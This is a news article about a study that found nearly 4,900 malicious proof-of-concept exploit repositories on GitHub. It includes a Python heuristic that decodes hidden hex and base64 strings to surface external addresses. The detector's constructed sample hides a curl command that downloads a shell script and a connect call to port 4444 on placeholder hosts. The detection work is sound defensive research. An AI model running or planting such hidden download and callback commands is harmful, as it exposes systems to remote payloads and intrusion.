On GitHub, researchers find nearly 4,900 repositories whose PoC code carries malware.

On the GitHub code hosting platform, a team of researchers discovered nearly 4,900 projects whose proof-of-concept (PoC) exploits can download files containing malware.

Developers publish these PoCs on GitHub so that the community can download and use them to validate vulnerability fixes or to assess the severity and reach of a security flaw.

Researchers at the Institute for Advanced Computer Science in Leiden, the Netherlands, examined 47,313 GitHub repositories containing PoCs for vulnerabilities discovered between 2017 and 2021.

Determining whether a PoC is malicious required extensive analysis: checking the IP addresses referenced in the repositories, analysing binaries, and decoding hexadecimal and base64 strings (commonly used to hide malicious payloads and scripts) to uncover connections to external IP addresses.
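
A defensive heuristic in the spirit of the hex/base64 analysis described above, written as an added example rather than the researchers' own tooling: it unwraps encoded strings found in a PoC file and lists the external IP addresses and URLs they reference. The sample PoC, its hidden command and its addresses are all constructed (documentation-range IPs), and the depth-limited unwrapping generalises to nested encodings.

```python
import base64, binascii
import ipaddress, re

TOKEN_RE = re.compile(r"[A-Za-z0-9+/=]{24,}")  # long opaque strings
HEX_RE = re.compile(r"(?:[0-9a-fA-F]{2})+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s'\"]+")

def decode_token(tok):
    """Decode a hex or base64 token; return None if it is neither."""
    try:
        if HEX_RE.fullmatch(tok):
            return bytes.fromhex(tok).decode("utf-8", "replace")
        if B64_RE.fullmatch(tok):
            return base64.b64decode(tok, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        pass  # looked like an encoding but was not one
    return None

def decode_layers(text, depth=2):
    """Append decoded blobs to `text`, repeating `depth` times for nesting."""
    layers, current = [text], text
    for _ in range(depth):
        found = [d for d in map(decode_token, TOKEN_RE.findall(current)) if d]
        if not found:
            break
        current = "\n".join(found)
        layers.append(current)
    return "\n".join(layers)

def external_indicators(text):
    """Sorted IPv4s and URLs in the decoded PoC; loopback is skipped because
    PoCs legitimately target localhost (real triage would also drop the target)."""
    decoded, ips = decode_layers(text), set()
    for ip in IPV4_RE.findall(decoded):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue  # e.g. 999.1.1.1 is not an address
        if not (addr.is_loopback or addr.is_unspecified or addr.is_multicast):
            ips.add(ip)
    return sorted(ips), sorted(set(URL_RE.findall(decoded)))

# Constructed sample (not a real repository): a harmless stub hiding a download.
HIDDEN = "import os; os.system('curl http://198.51.100.23/s.sh -o /tmp/s.sh')"
SAMPLE_POC = (
    "import socket\nTARGET = '127.0.0.1'\npayload = b'A' * 1024\n"
    "stage1 = '" + base64.b64encode(HIDDEN.encode()).decode() + "'\n"
    "stage2 = '" + b"connect('203.0.113.17', 4444)".hex() + "'\n"
)
```

Run `external_indicators(SAMPLE_POC)` to see both hidden addresses surface while the loopback target is ignored.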

According to the research paper, 4,893 of the assessed repositories (10.3 percent of the total) were deemed malicious, and the majority of them referred to 2020 vulnerabilities.

They emphasize in the paper that “this rate of unreliable exploits is rather concerning, as they are being exploited by people all over the world.”

The paper also notes that the researchers found a significant volume of malware and harmful scripts, including the JavaScript-based Houdini Trojan and a Python script in a proof of concept for the BlueKeep vulnerability, CVE-2019-0708.

The researchers, who reported their findings to GitHub, recognize the need for more reliable detection methods, while acknowledging how challenging it is to fully automate the detection process in order to stop future attacks.

By Editor
